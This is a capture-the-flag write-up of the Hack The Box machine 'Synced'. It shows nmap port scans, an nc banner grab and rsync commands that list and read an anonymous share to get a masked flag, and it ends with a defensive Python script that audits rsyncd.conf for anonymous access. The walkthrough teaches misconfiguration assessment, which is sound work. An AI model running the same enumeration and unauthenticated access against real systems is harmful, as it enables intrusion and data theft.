HTB Synced

Today we return with another of the very easy HTB boxes, as we try to finish them all.

$ nmap -v -p- 10.129.228.37 --min-rate 5000

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 11:01 CET
Initiating Ping Scan at 11:01
Scanning 10.129.228.37 [2 ports]
Completed Ping Scan at 11:01, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:01
Completed Parallel DNS resolution of 1 host. at 11:01, 0.03s elapsed
Initiating Connect Scan at 11:01
Scanning 10.129.228.37 [65535 ports]
...
Discovered open port 873/tcp on 10.129.228.37
...
PORT    STATE SERVICE
873/tcp open  rsync

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 35.09 seconds

The rsync service is listening on port 873/tcp.
Let’s see which version rsync is using…

$ nmap -v -p873 -sV 10.129.228.37 --min-rate 5000

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 11:04 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 11:04
Scanning 10.129.228.37 [2 ports]
...
Nmap scan report for 10.129.228.37
Host is up (0.13s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds

Another option:

$ nc -vn 10.129.228.37 873

Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 10.129.228.37:873.
@RSYNCD: 31.0

Rsync protocol is version 31.

From Linux, we can talk to the rsync service with the rsync client.

$ rsync --help

rsync  version 3.2.6  protocol version 31
Copyright (C) 1996-2022 by Andrew Tridgell, Wayne Davison, and others.
Web site: https://rsync.samba.org/
Capabilities:
    64-bit files, 64-bit inums, 64-bit timestamps, 64-bit long ints,
    socketpairs, symlinks, symtimes, hardlinks, hardlink-specials,
    hardlink-symlinks, IPv6, atimes, batchfiles, inplace, append, ACLs,
    xattrs, optional secluded-args, iconv, prealloc, stop-at, no crtimes
Optimizations:
    no SIMD-roll, no asm-roll, openssl-crypto, no asm-MD5
Checksum list:
    xxh128 xxh3 xxh64 (xxhash) md5 md4 none
Compress list:
    zstd lz4 zlibx zlib none

rsync comes with ABSOLUTELY NO WARRANTY.  This is free software, and you
are welcome to redistribute it under certain conditions.  See the GNU
General Public Licence for details.

rsync is a file transfer program capable of efficient remote update
via a fast differencing algorithm.
...

$ rsync rsync://10.129.228.37

public         	Anonymous Share

This rsync service allows anonymous access: no credentials are needed to reach the public module.

$ rsync rsync://10.129.228.37/public

drwxr-xr-x          4.096 2022/10/25 00:02:23 .
-rw-r--r--             33 2022/10/24 23:32:03 flag.txt

Using --list-only, rsync will just list the files instead of copying them.

$ cat flag.txt

72eaXXXXXXXXXXXXXXXXXXXXXXXXXXXX
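
Seen from the server side, the finding on this box is an rsync module that any client can list and read without credentials. The script below is an added example, not part of the original write-up: it audits rsyncd.conf text for that condition, and its sample configuration, paths and backups module are constructed for illustration.

```python
# Added example; SAMPLE_CONF is constructed (paths and [backups] are hypothetical).
SAMPLE_CONF = """\
[public]
    comment = Anonymous Share
    path = /srv/rsync/public
    read only = yes
[backups]
    path = /srv/rsync/backups
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
    list = no
"""

def parse_conf(text):
    """Return (global_params, {module: params}) parsed from rsyncd.conf text."""
    globals_, modules = {}, {}
    current = globals_
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), {})
        elif "=" in line:
            name, value = line.split("=", 1)
            # rsyncd.conf ignores whitespace inside parameter names
            current["".join(name.split()).lower()] = value.strip()
    return globals_, modules

def audit(text):
    """Map each module name to the weaknesses found in its effective settings."""
    globals_, modules = parse_conf(text)
    report = {}
    for name, params in modules.items():
        eff = {**globals_, **params}  # module settings override global ones
        issues = []
        if not eff.get("authusers"):
            issues.append("anonymous access (no auth users)")
        if not eff.get("hostsallow"):
            issues.append("no hosts allow restriction")
        if eff.get("list", "yes").lower() in ("yes", "true", "1"):
            issues.append("module is listed to any client")
        if eff.get("readonly", "yes").lower() in ("no", "false", "0"):
            issues.append("writable")
        report[name] = issues
    return report

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

A module with an empty issue list requires a user from `auth users`, is limited by `hosts allow`, and is hidden from the module listing.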
